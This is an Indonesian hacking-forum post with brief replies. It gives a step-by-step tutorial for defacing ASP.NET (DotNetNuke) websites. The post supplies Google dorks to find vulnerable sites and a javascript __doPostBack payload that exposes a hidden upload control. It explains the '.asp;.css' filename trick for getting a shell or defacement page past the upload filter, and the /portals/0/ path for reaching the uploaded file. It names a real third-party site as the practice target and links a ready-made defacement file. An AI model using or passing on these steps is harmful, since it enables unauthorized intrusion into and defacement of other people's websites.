[ TUTOR ] How to defacing aspx

mlikum gan
sebelumnya ane mnta maaf, apabila topik yang saya buat ini udah di bahas sebelumnya
tetapi ane mau sharing apa aja yang ane tau

anggep aja hadiah dari ane, krn lolos tes jdi momod xP

oke, agan udh liat judulnya ??
"defacing
aspx" apaan tuh ?? defacing aspx mksd gw itu, nge deface halaman lain
dari suatu web vuln yang menggunakan basis data aspx selain halaman
utama

oke, daripada lama2 langsung aja

ini dorknya : inurl:tabid"aspx"
bisa juga : inurl:fck/fcklinlgallery.aspx

oke kali ini gw udh nemu nih

1. kalo gw kan udh nemu, kalian juga harus nemuin, boleh juga pake halaman ini
2. untuk kali ini saya rekomendasikan untuk menggunakan [ http://fril.co.il/ ]
3. tambahkan kalimat ini : "providers/htmleditorproviders/fck/fcklinkgallery.aspx" di blakang url tsbt
4. sehingga akan menjadi seperti ini :
"http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
5. oke sekarang ada halaman yang kurang lebih akan seperti ini

Spoiler:
	Enlarge this imageReduce this image Click to see fullsize

6. lalu klik lah "(File (A file on your site" nih pic nya

Spoiler:
	Enlarge this imageReduce this image Click to see fullsize

7. setelah nge klik itu, tnggu loading selesai baru kita harus
ganti alamat protocol website nya . . ga ngerti ??
nah kan tadi alamat nya "http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx" nah kita ganti bro jadi
"javascript:__doPostBack('ctlURL$cmdUpload','')" => [ tanpa tanda kutip 2 ]

8. setelah selesai masukin kode di atas ntar keluar sendiri tuh, tombol browse kaya gni pic nya :

Spoiler:
	Enlarge this imageReduce this image Click to see fullsize

9. nah kita upload deh, shell / signature yang mau kita masukin
kalo ga punya signature, pake signature buatan ane aja
bisa di download di sini :[ http://www.ziddu.com/download/13217079/n...t.txt.html ]
klo udh download ente boleh rubah se kreatif ente

oiya PENTING NIH !! file yg bisa di upload antara lain :

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,

so, klo mw pake signature buatan gw kan ekstensi nya masih [.txt]

kita ubah langsung, sebelum upload ubah ekstensi nya menjadi ".asp;.css"

misal : "namasignatureLO.asp;.css" ingat ! kita harus menambahkan titik

nya dua kali " namasignatureLO[.]asp;[.]css " maksd gw titik 2 itu yang gw kurungin sehingga . .

yang tadi nya signature gw bernama "neutronxscript.txt" harus ente rubah . .

nama neutron nya terserah diubah ke apa tetapi pastikan berakhiran ".asp;.css"
kata
"css" nya bisa diganti berdasarkan daftar di atas, misal *.xml , *.jpg
- nah yang tanda * itu = ".asp;" [ tanpa tanda kutip 2 ]

sehingga kurang lebih akan menjadi seperti ini ekstensi nya

"namasignatureLO.asp;.css" / "namasignatureLO.asp;.xml"


10. upload, trus ktia buka hasil deface nya . .

kita liat dlu tadi nama file yang kita upload apa

misal : "signatureLO.asp;.css" kita buka alamat protocol nya

caranya : kan tadi alamat nya

"http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx"
[ dengan catatan setelah kita berhasil / selesai upload signature kita ]

11. nah, cakep tuh gan kita rubah alamat
"http://fril.co.il/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

menjadi alamat halaman defaced kita menjadi" http://fril.co.il/portals/0/signatureLO.asp;.css" so , intinya kita

harus menambahkan "portals/0/namasignatureLO.asp;.css" pada akhir "http:/fril.co.il/"

12. selamat, anda berhasil defacing halaman !!

sebelumnya ane minta maaf klo banyak kekurangan dalam posting ini
ane cuma ingin menyebarkan info kepada rekan2 sesama yang masih "newbie"

untuk video nya, saya ingin buat tapi studiocam saya lagi corrupt mulu nih pas ngerekam, mau ga mau kasih tutor lisan aja

NB
: di coba dulu om, klo gagal di coba terus kalo ga ngerti ngertiin om
diperlukan kemauan yang kuat dan pikiran yang kreatif untuk menjadi
seorang hacker

"GA NOLAK CENDOL KAKA, kalo emang berguna"

pas ni buat bahan belajar saya

thx infonya ..